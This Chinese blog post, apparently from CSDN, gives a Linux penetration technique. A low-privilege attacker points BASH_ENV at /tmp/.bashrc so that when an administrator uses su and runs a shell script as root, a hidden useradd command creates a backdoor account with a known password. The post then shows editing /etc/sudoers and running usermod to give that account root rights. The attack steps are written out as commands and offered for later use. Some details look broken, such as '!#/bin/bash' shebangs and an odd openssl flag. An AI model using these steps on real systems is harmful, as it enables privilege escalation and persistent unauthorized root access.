linux渗透的奇技淫巧

linux渗透的奇技淫巧

在网上get到了一个给Linux添加用户的技巧,通过环境变量执行脚本,进而达到添加 用户的目的。算不上是提权,记录一下,或许以后会有用。
通常,Linux在执行bash脚本时,如果BASH_ENV被设置的话,它就会执行BASH_ENV指向 的脚本。
首先先看一个例子

第一步:建立一个test.sh脚本

!#/bin/bash
echo "test"

第二步:在/tmp/目录下建立一个.bashrc

!#/bin/bash
echo "bashrc"

第三步:设置环境变量$BASH_ENV

echo $BASH_ENV
export BASH_ENV="/tmp/.bashrc"

第四步:设置脚本权限,执行脚本,查看输出

chmod 775 test.sh
./test.sh
结果会输出
bashrc
test

可以看出,如果设置了环境变量BASH_ENV,如果用户执行sh脚本,则会执行BASH_ENV 指向的脚本。那么如何利用呢?

当我们拿到Linux的低权限用户时,可以查看一下主机是否经常用su来登录root,如果有这样的情况,那么就可以这样做……(看下面)
首先看一下su后环境变量在不在,经过在自己的机器上检查,su后$BASH_ENV还是存在的,那就好办了。
现在在/tmp/.bashrc中写入如下内容

useradd -p `openssl passwd -l -salt '123' test1234` test

/这是注释,不用谢(增加用户test,密码为test1234)/
主机用户利用su登录到root用户后,执行.sh脚本,就会先去执行如上命令,成功添加用户。
用 cat /etc/passwd可以看到结果
需要注意的:
1.test.sh的权限设置别错了
2.这里不能直接加入root组,除非在.sh脚本里写一个功能,实现修改修改/etc/sudoers文件。
找到下面一行,把前面的注释(#)去掉

## Allows people in group wheel to run all commands
%wheel    ALL=(ALL)    ALL

然后在再执行命令

usermod -g root test

这样就可以添加拥有root权限的用户了。

怎么给普通用户root权限?请移步
learning from

发布了84 篇原创文章 · 获赞 81 · 访问量 17万+
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 大白 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览